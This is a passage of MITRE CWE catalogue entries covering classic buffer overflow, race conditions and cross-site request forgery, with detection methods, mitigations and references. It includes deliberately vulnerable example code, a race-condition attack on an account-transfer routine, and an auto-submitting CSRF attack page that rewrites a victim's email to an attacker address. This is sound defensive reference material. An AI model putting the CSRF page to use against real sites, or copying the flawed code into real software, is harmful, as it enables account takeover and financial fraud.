Seven Pernicious Kingdoms (primary)700
ChildOfWeakness ClassWeakness Class119Improper Restriction of Operations within the Bounds of a Memory Buffer
Development Concepts (primary)699
Research Concepts (primary)1000
ChildOfCategoryCategory633Weaknesses that Affect Memory
Resource-specific Weaknesses (primary)631
ChildOfCategoryCategory722OWASP Top Ten 2004 Category A1 - Unvalidated Input
Weaknesses in OWASP Top Ten (2004)711
ChildOfCategoryCategory726OWASP Top Ten 2004 Category A5 - Buffer Overflows
Weaknesses in OWASP Top Ten (2004) (primary)711
ChildOfCategoryCategory741CERT C Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory8022010 Top 25 - Risky Resource Management
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory8652011 Top 25 - Risky Resource Management
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory875CERT C++ Secure Coding Section 07 - Characters and Strings (STR)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory970SFP Secondary Cluster: Faulty Buffer Access
Software Fault Pattern (SFP) Clusters (primary)888
CanPrecedeWeakness BaseWeakness Base123Write-what-where Condition
Research Concepts1000
ParentOfWeakness VariantWeakness Variant785Use of Path Manipulation Function without Maximum-sized Buffer
Development Concepts (primary)699
Research Concepts1000
MemberOfViewView884CWE Cross-section
CWE Cross-section (primary)884
CanFollowWeakness BaseWeakness Base170Improper Null Termination
Research Concepts1000
CanFollowWeakness VariantWeakness Variant231Improper Handling of Extra Values
Research Concepts1000
CanFollowWeakness BaseWeakness Base242Use of Inherently Dangerous Function
Research Concepts1000
CanFollowWeakness BaseWeakness Base416Use After Free
Research Concepts1000
CanFollowWeakness BaseWeakness Base456Missing Initialization of a Variable
Research Concepts1000
CanAlsoBeWeakness VariantWeakness Variant196Unsigned to Signed Conversion Error
Research Concepts1000
+ Relationship Notes

At the code level, stack-based and heap-based overflows do not differ significantly, so there usually is not a need to distinguish them. From the attacker perspective, they can be quite different, since different techniques are required to exploit them.

+ Affected Resources
  • Memory
+ Functional Areas
  • Memory Management
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERUnbounded Transfer ('classic overflow')
7 Pernicious KingdomsBuffer Overflow
CLASPBuffer overflow
OWASP Top Ten 2004A1CWE More SpecificUnvalidated Input
OWASP Top Ten 2004A5CWE More SpecificBuffer Overflows
CERT C Secure CodingSTR35-CDo not copy data from an unbounded source to a fixed-length array
WASC7Buffer Overflow
CERT C++ Secure CodingSTR35-CPPDo not copy data from an unbounded source to a fixed-length array
Software Fault PatternsSFP8Faulty Buffer Access
+ White Box Definitions

A weakness where the code path includes a Buffer Write Operation such that:

1. the expected size of the buffer is greater than the actual size of the buffer where expected size is equal to the sum of the size of the data item and the position in the buffer

Where Buffer Write Operation is a statement that writes a data item of a certain size into a buffer at a certain position and at a certain index

+ References
[R.120.1] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 5, "Public Enemy #1: The Buffer Overrun" Page 127. 2nd Edition. Microsoft. 2002.
[R.120.2] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 5: Buffer Overruns." Page 89. McGraw-Hill. 2010.
[R.120.3] [REF-27] Microsoft. "Using the Strsafe.h Functions". <http://msdn.microsoft.com/en-us/library/ms647466.aspx>.
[R.120.4] [REF-26] Matt Messier and John Viega. "Safe C String Library v1.0.3". <http://www.zork.org/safestr/>.
[R.120.5] [REF-22] Michael Howard. "Address Space Layout Randomization in Windows Vista". <http://blogs.msdn.com/michael_howard/archive/2006/05/26/address-space-layout-randomization-in-windows-vista.aspx>.
[R.120.6] Arjan van de Ven. "Limiting buffer overflows with ExecShield". <http://www.redhat.com/magazine/009jul05/features/execshield/>.
[R.120.7] [REF-29] "PaX". <http://en.wikipedia.org/wiki/PaX>.
[R.120.8] Jason Lam. "Top 25 Series - Rank 3 - Classic Buffer Overflow". SANS Software Security Institute. 2010-03-02. <http://software-security.sans.org/blog/2010/03/02/top-25-series-rank-3-classic-buffer-overflow/>.
[R.120.9] [REF-25] Microsoft. "Understanding DEP as a mitigation technology part 1". <http://blogs.technet.com/b/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-1.aspx>.
[R.120.10] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.120.11] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 3, "Nonexecutable Stack", Page 76.. 1st Edition. Addison Wesley. 2006.
[R.120.12] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 5, "Protection Mechanisms", Page 189.. 1st Edition. Addison Wesley. 2006.
[R.120.13] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 8, "C String Handling", Page 388.. 1st Edition. Addison Wesley. 2006.
[R.120.14] [REF-37] Grant Murphy. "Position Independent Executables (PIE)". Red Hat. 2012-11-28. <https://securityblog.redhat.com/2012/11/28/position-independent-executables-pie/>.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-08-15VeracodeExternal
Suggested OWASP Top Ten 2004 mapping
2008-09-08CWE Content TeamMITREInternal
updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2008-10-10CWE Content TeamMITREInternal
Changed name and description to more clearly emphasize the "classic" nature of the overflow.
2008-10-14CWE Content TeamMITREInternal
updated Alternate_Terms, Description, Name, Other_Notes, Terminology_Notes
2008-11-24CWE Content TeamMITREInternal
updated Other_Notes, Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships
2009-07-27CWE Content TeamMITREInternal
updated Other_Notes, Potential_Mitigations, Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences, Relationships
2010-02-16CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type
2010-04-05CWE Content TeamMITREInternal
updated Demonstrative_Examples, Related_Attack_Patterns
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Demonstrative_Examples, Description
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-02-18CWE Content TeamMITREInternal
updated Potential_Mitigations, References
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships, Taxonomy_Mappings
Previous Entry Names
Change DatePrevious Entry Name
2008-10-14Unbounded Transfer ('Classic Buffer Overflow')

CWE-362: Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')

Weakness ID: 362
Abstraction: Class
Status: Draft
Presentation Filter:
+ Description

Description Summary

The program contains a code sequence that can run concurrently with other code, and the code sequence requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence that is operating concurrently.

Extended Description

This can have security implications when the expected synchronization is in security-critical code, such as recording whether a user is authenticated or modifying important state information that should not be influenced by an outsider.

A race condition occurs within concurrent environments, and is effectively a property of a code sequence. Depending on the context, a code sequence may be in the form of a function call, a small number of instructions, a series of program invocations, etc.

A race condition violates these properties, which are closely related:

  • Exclusivity - the code sequence is given exclusive access to the shared resource, i.e., no other code sequence can modify properties of the shared resource before the original sequence has completed execution.

  • Atomicity - the code sequence is behaviorally atomic, i.e., no other thread or process can concurrently execute the same sequence of instructions (or a subset) against the same resource.

A race condition exists when an "interfering code sequence" can still access the shared resource, violating exclusivity. Programmers may assume that certain code sequences execute too quickly to be affected by an interfering code sequence; when they are not, this violates atomicity. For example, the single "x++" statement may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read (the original value of x), followed by a computation (x+1), followed by a write (save the result to x).

The interfering code sequence could be "trusted" or "untrusted." A trusted interfering code sequence occurs within the program; it cannot be modified by the attacker, and it can only be invoked indirectly. An untrusted interfering code sequence can be authored directly by the attacker, and typically it is external to the vulnerable program.

+ Time of Introduction
  • Architecture and Design
  • Implementation
+ Applicable Platforms

Languages

C: (Sometimes)

C++: (Sometimes)

Java: (Sometimes)

Language-independent

Architectural Paradigms

Concurrent Systems Operating on Shared Resources: (Often)

+ Common Consequences
ScopeEffect
Availability

Technical Impact: DoS: resource consumption (CPU); DoS: resource consumption (memory); DoS: resource consumption (other)

When a race condition makes it possible to bypass a resource cleanup routine or trigger multiple initialization routines, it may lead to resource exhaustion (CWE-400).

Availability

Technical Impact: DoS: crash / exit / restart; DoS: instability

When a race condition allows multiple control flows to access a resource simultaneously, it might lead the program(s) into unexpected states, possibly resulting in a crash.

Confidentiality
Integrity

Technical Impact: Read files or directories; Read application data

When a race condition is combined with predictable resource names and loose permissions, it may be possible for an attacker to overwrite or access confidential data (CWE-59).

+ Likelihood of Exploit

Medium

+ Detection Methods

Black Box

Black box methods may be able to identify evidence of race conditions via methods such as multiple simultaneous connections, which may cause the software to become instable or crash. However, race conditions with very narrow timing windows would not be detectable.

White Box

Common idioms are detectable in white box analysis, such as time-of-check-time-of-use (TOCTOU) file operations (CWE-367), or double-checked locking (CWE-609).

Automated Dynamic Analysis

This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Race conditions may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior.

Insert breakpoints or delays in between relevant code statements to artificially expand the race window so that it will be easier to detect.

Effectiveness: Moderate

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

Cost effective for partial coverage:

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Web Application Scanner

  • Web Services Scanner

  • Database Scanners

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Framework-based Fuzzer

Cost effective for partial coverage:

  • Fuzz Tester

  • Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR High

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This code could be used in an e-commerce application that supports transfers between accounts. It takes the total amount of the transfer, sends it to the new account, and deducts the amount from the original account.

(Bad Code)
Example Language: Perl 
$transfer_amount = GetTransferAmount();
$balance = GetBalanceFromDatabase();

if ($transfer_amount < 0) {
FatalError("Bad Transfer Amount");
}
$newbalance = $balance - $transfer_amount;
if (($balance - $transfer_amount) < 0) {
FatalError("Insufficient Funds");
}
SendNewBalanceToDatabase($newbalance);
NotifyUser("Transfer of $transfer_amount succeeded.");
NotifyUser("New balance: $newbalance");

A race condition could occur between the calls to GetBalanceFromDatabase() and SendNewBalanceToDatabase().

Suppose the balance is initially 100.00. An attack could be constructed as follows:

(Attack)
Example Language: PseudoCode 
The attacker makes two simultaneous calls of the program, CALLER-1 and CALLER-2. Both callers are for the same user account.
CALLER-1 (the attacker) is associated with PROGRAM-1 (the instance that handles CALLER-1). CALLER-2 is associated with PROGRAM-2.
CALLER-1 makes a transfer request of 80.00.
PROGRAM-1 calls GetBalanceFromDatabase and sets $balance to 100.00
PROGRAM-1 calculates $newbalance as 20.00, then calls SendNewBalanceToDatabase().
Due to high server load, the PROGRAM-1 call to SendNewBalanceToDatabase() encounters a delay.
CALLER-2 makes a transfer request of 1.00.
PROGRAM-2 calls GetBalanceFromDatabase() and sets $balance to 100.00. This happens because the previous PROGRAM-1 request was not processed yet.
PROGRAM-2 determines the new balance as 99.00.
After the initial delay, PROGRAM-1 commits its balance to the database, setting it to 20.00.
PROGRAM-2 sends a request to update the database, setting the balance to 99.00

At this stage, the attacker should have a balance of 19.00 (due to 81.00 worth of transfers), but the balance is 99.00, as recorded in the database.

To prevent this weakness, the programmer has several options, including using a lock to prevent multiple simultaneous requests to the web application, or using a synchronization mechanism that includes all the code between GetBalanceFromDatabase() and SendNewBalanceToDatabase().

Example 2

The following function attempts to acquire a lock in order to perform operations on a shared resource.

(Bad Code)
Example Language:
void f(pthread_mutex_t *mutex) {
pthread_mutex_lock(mutex);

/* access shared resource */

pthread_mutex_unlock(mutex);
}

However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.

In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting it to higher levels.

(Good Code)
 
int f(pthread_mutex_t *mutex) {
int result;

result = pthread_mutex_lock(mutex);
if (0 != result)
return result;

/* access shared resource */

return pthread_mutex_unlock(mutex);
}
+ Observed Examples
ReferenceDescription
Race condition leading to a crash by calling a hook removal procedure while other activities are occurring at the same time.
chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.
chain: time-of-check time-of-use (TOCTOU) race condition in program allows bypass of protection mechanism that was designed to prevent symlink attacks.
Unsynchronized caching operation enables a race condition that causes messages to be sent to a deallocated object.
Race condition during initialization triggers a buffer overflow.
Daemon crash by quickly performing operations and undoing them, which eventually leads to an operation that does not acquire a lock.
chain: race condition triggers NULL pointer dereference
Race condition in library function could cause data to be sent to the wrong process.
Race condition in file parser leads to heap corruption.
chain: race condition allows attacker to access an object while it is still being initialized, causing software to access uninitialized memory.
chain: race condition for an argument value, possibly resulting in NULL dereference
chain: race condition might allow resource to be released before operating on it, leading to NULL dereference
+ Potential Mitigations

Phase: Architecture and Design

In languages that support it, use synchronization primitives. Only wrap these around critical code to minimize the impact on performance.

Phase: Architecture and Design

Use thread-safe capabilities such as the data access abstraction in Spring.

Phase: Architecture and Design

Minimize the usage of shared resources in order to remove as much complexity as possible from the control flow and to reduce the likelihood of unexpected conditions occurring.

Additionally, this will minimize the amount of synchronization necessary and may even help to reduce the likelihood of a denial of service where an attacker may be able to repeatedly trigger a critical section (CWE-400).

Phase: Implementation

When using multithreading and operating on shared variables, only use thread-safe functions.

Phase: Implementation

Use atomic operations on shared variables. Be wary of innocent-looking constructs such as "x++". This may appear atomic at the code layer, but it is actually non-atomic at the instruction layer, since it involves a read, followed by a computation, followed by a write.

Phase: Implementation

Use a mutex if available, but be sure to avoid related weaknesses such as CWE-412.

Phase: Implementation

Avoid double-checked locking (CWE-609) and other implementation errors that arise when trying to avoid the overhead of synchronization.

Phase: Implementation

Disable interrupts or signals over critical parts of the code, but also make sure that the code does not go into a large or infinite loop.

Phase: Implementation

Use the volatile type modifier for critical variables to avoid unexpected compiler optimization or reordering. This does not necessarily solve the synchronization problem, but it can help.

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.362.11]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory361Time and State
Development Concepts (primary)699
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
ChildOfWeakness ClassWeakness Class691Insufficient Control Flow Management
Research Concepts (primary)1000
ChildOfCategoryCategory743CERT C Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C Secure Coding Standard (primary)734
ChildOfCategoryCategory7512009 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)750
ChildOfCategoryCategory8012010 Top 25 - Insecure Interaction Between Components
Weaknesses in the 2010 CWE/SANS Top 25 Most Dangerous Programming Errors (primary)800
ChildOfCategoryCategory852CERT Java Secure Coding Section 07 - Visibility and Atomicity (VNA)
Weaknesses Addressed by the CERT Java Secure Coding Standard (primary)844
ChildOfCategoryCategory8672011 Top 25 - Weaknesses On the Cusp
Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary)900
ChildOfCategoryCategory877CERT C++ Secure Coding Section 09 - Input Output (FIO)
Weaknesses Addressed by the CERT C++ Secure Coding Standard868
ChildOfCategoryCategory882CERT C++ Secure Coding Section 14 - Concurrency (CON)
Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary)868
ChildOfCategoryCategory988SFP Secondary Cluster: Race Condition Window
Software Fault Pattern (SFP) Clusters (primary)888
RequiredByCompound Element: CompositeCompound Element: Composite61UNIX Symbolic Link (Symlink) Following
Research Concepts1000
RequiredByCompound Element: CompositeCompound Element: Composite689Permission Race Condition During Resource Copy
Research Concepts1000
ParentOfWeakness BaseWeakness Base364Signal Handler Race Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base366Race Condition within a Thread
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base367Time-of-check Time-of-use (TOCTOU) Race Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base368Context Switching Race Condition
Development Concepts (primary)699
Research Concepts (primary)1000
ParentOfWeakness BaseWeakness Base421Race Condition During Access to Alternate Channel
Development Concepts699
Research Concepts1000
MemberOfViewView635Weaknesses Used by NVD
Weaknesses Used by NVD (primary)635
CanFollowWeakness BaseWeakness Base662Improper Synchronization
Development Concepts699
Research Concepts1000
CanAlsoBeCategoryCategory557Concurrency Issues
Research Concepts1000
+ Research Gaps

Race conditions in web applications are under-studied and probably under-reported. However, in 2008 there has been growing interest in this area.

Much of the focus of race condition research has been in Time-of-check Time-of-use (TOCTOU) variants (CWE-367), but many race conditions are related to synchronization problems that do not necessarily require a time-of-check.

+ Taxonomy Mappings
Mapped Taxonomy NameNode IDFitMapped Node Name
PLOVERRace Conditions
CERT C Secure CodingFIO31-CDo not simultaneously open the same file multiple times
CERT Java Secure CodingVNA03-JDo not assume that a group of calls to independently atomic methods is atomic
CERT C++ Secure CodingFIO31-CPPDo not simultaneously open the same file multiple times
CERT C++ Secure CodingCON02-CPPUse lock classes for mutex management
+ References
[R.362.1] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 13: Race Conditions." Page 205. McGraw-Hill. 2010.
[R.362.2] Andrei Alexandrescu. "volatile - Multithreaded Programmer's Best Friend". Dr. Dobb's. 2008-02-01. <http://www.ddj.com/cpp/184403766>.
[R.362.3] Steven Devijver. "Thread-safe webapps using Spring". <http://www.javalobby.org/articles/thread-safe/index.jsp>.
[R.362.4] David Wheeler. "Prevent race conditions". 2007-10-04. <http://www.ibm.com/developerworks/library/l-sprace.html>.
[R.362.5] Matt Bishop. "Race Conditions, Files, and Security Flaws; or the Tortoise and the Hare Redux". September 1995. <http://www.cs.ucdavis.edu/research/tech-reports/1995/CSE-95-9.pdf>.
[R.362.6] David Wheeler. "Secure Programming for Linux and Unix HOWTO". 2003-03-03. <http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/avoid-race.html>.
[R.362.7] Blake Watts. "Discovering and Exploiting Named Pipe Security Flaws for Fun and Profit". April 2002. <http://www.blakewatts.com/namedpipepaper.html>.
[R.362.8] Roberto Paleari, Davide Marrone, Danilo Bruschi and Mattia Monga. "On Race Vulnerabilities in Web Applications". <http://security.dico.unimi.it/~roberto/pubs/dimva08-web.pdf>.
[R.362.9] "Avoiding Race Conditions and Insecure File Operations". Apple Developer Connection. <http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/RaceConditions.html>.
[R.362.10] Johannes Ullrich. "Top 25 Series - Rank 25 - Race Conditions". SANS Software Security Institute. 2010-03-26. <http://blogs.sans.org/appsecstreetfighter/2010/03/26/top-25-series-rank-25-race-conditions/>.
[R.362.11] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
+ Maintenance Notes

The relationship between race conditions and synchronization problems (CWE-662) needs to be further developed. They are not necessarily two perspectives of the same core concept, since synchronization is only one technique for avoiding race conditions, and synchronization can be used for other purposes besides race condition prevention.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Contributions
Contribution DateContributorOrganizationSource
2010-04-30Martin SeborCisco Systems, Inc. Content
Provided Demonstrative Example
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Relationships
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-01-12CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Maintenance_Notes, Observed_Examples, Potential_Mitigations, References, Relationships, Research_Gaps
2009-03-10CWE Content TeamMITREInternal
updated Demonstrative_Examples, Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Relationships
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, References, Relationships
2010-06-21CWE Content TeamMITREInternal
updated Common_Consequences, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References
2010-09-27CWE Content TeamMITREInternal
updated Observed_Examples, Potential_Mitigations, Relationships
2010-12-13CWE Content TeamMITREInternal
updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Relationships
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors, Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
Previous Entry Names
Change DatePrevious Entry Name
2008-04-11Race Conditions
2010-12-13Race Condition

CWE-352: Cross-Site Request Forgery (CSRF)

Compound Element ID: 352
Abstraction: Variant
Structure: Composite
Status: Draft
Presentation Filter:
+ Description

Description Summary

The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Extended Description

When a web server is designed to receive a request from a client without any mechanism for verifying that it was intentionally sent, then it might be possible for an attacker to trick a client into making an unintentional request to the web server which will be treated as an authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and can result in exposure of data or unintended code execution.

+ Alternate Terms
Session Riding
Cross Site Reference Forgery
XSRF
+ Time of Introduction
  • Architecture and Design
+ Applicable Platforms

Languages

Language-independent

Technology Classes

Web-Server

+ Common Consequences
ScopeEffect
Confidentiality
Integrity
Availability
Non-Repudiation
Access Control

Technical Impact: Gain privileges / assume identity; Bypass protection mechanism; Read application data; Modify application data; DoS: crash / exit / restart

The consequences will vary depending on the nature of the functionality that is vulnerable to CSRF. An attacker could effectively perform any operations as the victim. If the victim is an administrator or privileged user, the consequences may include obtaining complete control over the web application - deleting or stealing data, uninstalling the product, or using it to launch other attacks against all of the product's users. Because the attacker has the identity of the victim, the scope of CSRF is limited only by the victim's privileges.

+ Likelihood of Exploit

Medium to High

+ Detection Methods

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

Specifically, manual analysis can be useful for finding this weakness, and for minimizing false positives assuming an understanding of business logic. However, it might not achieve desired code coverage within limited time constraints. For black-box analysis, if credentials are not known for privileged accounts, then the most security-critical portions of the application may not receive sufficient attention.

Consider using OWASP CSRFTester to identify potential issues and aid in manual analysis.

Effectiveness: High

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

Automated Static Analysis

CSRF is currently difficult to detect reliably using automated techniques. This is because each application has its own implicit security policy that dictates which requests can be influenced by an outsider and automatically performed on behalf of a user, versus which requests require strong confidence that the user intends to make the request. For example, a keyword search of the public portion of a web site is typically expected to be encoded within a link that can be launched automatically when the user clicks on the link.

Effectiveness: Limited

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR Partial

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Web Application Scanner

Effectiveness: SOAR High

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Fuzz Tester

  • Framework-based Fuzzer

Effectiveness: SOAR High

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

  • Manual Source Code Review (not inspections)

Effectiveness: SOAR Partial

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

  • Formal Methods / Correct-By-Construction

Effectiveness: SOAR Partial

+ Demonstrative Examples

Example 1

This example PHP code attempts to secure the form submission process by validating that the user submitting the form has a valid session. A CSRF attack would not be prevented by this countermeasure because the attacker forges a request through the user's web browser in which a valid session already exists.

The following HTML is intended to allow a user to update a profile.

(Bad Code)
Example Language: HTML 
<form action="/url/profile.php" method="post">
<input type="text" name="firstname"/>
<input type="text" name="lastname"/>
<br/>
<input type="text" name="email"/>
<input type="submit" name="submit" value="Update"/>
</form>

profile.php contains the following code.

(Bad Code)
Example Language: PHP 
// initiate the session in order to validate sessions

session_start();

//if the session is registered to a valid user then allow update

if (! session_is_registered("username")) {

echo "invalid session detected!";

// Redirect user to login page
[...]

exit;
}

// The user session is valid, so process the request
// and update the information

update_profile();

function update_profile {
// read in the data from $POST and send an update
// to the database
SendUpdateToDatabase($_SESSION['username'], $_POST['email']);
[...]
echo "Your profile has been successfully updated.";
}

This code may look protected since it checks for a valid session. However, CSRF attacks can be staged from virtually any tag or HTML construct, including image tags, links, embed or object tags, or other attributes that load background images.

The attacker can then host code that will silently change the username and email address of any user that visits the page while remaining logged in to the target web application. The code might be an innocent-looking web page such as:

(Attack)
Example Language: HTML 
<SCRIPT>
function SendAttack () {
form.email = "attacker@example.com";
// send to profile.php
form.submit();
}
</SCRIPT>

<BODY onload="javascript:SendAttack();">

<form action="http://victim.example.com/profile.php" id="form" method="post">
<input type="hidden" name="firstname" value="Funny">
<input type="hidden" name="lastname" value="Joke">
<br/>
<input type="hidden" name="email">
</form>

Notice how the form contains hidden fields, so when it is loaded into the browser, the user will not notice it. Because SendAttack() is defined in the body's onload attribute, it will be automatically called when the victim loads the web page.

Assuming that the user is already logged in to victim.example.com, profile.php will see that a valid user session has been established, then update the email address to the attacker's own address. At this stage, the user's identity has been compromised, and messages sent through this profile could be sent to the attacker's address.

+ Observed Examples
ReferenceDescription
Add user accounts via a URL in an img tag
Add user accounts via a URL in an img tag
Arbitrary code execution by specifying the code in a crafted img tag or URL
Gain administrative privileges via a URL in an img tag
Delete a victim's information via a URL or an img tag
Change another user's settings via a URL or an img tag
Perform actions as administrator via a URL or an img tag
modify password for the administrator
CMS allows modification of configuration via CSRF attack against the administrator
web interface allows password changes or stopping a virtual machine via CSRF
+ Potential Mitigations

Phase: Architecture and Design

Strategy: Libraries or Frameworks

Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.

For example, use anti-CSRF packages such as the OWASP CSRFGuard. [R.352.3]

Another example is the ESAPI Session Management control, which includes a component for CSRF. [R.352.9]

Phase: Implementation

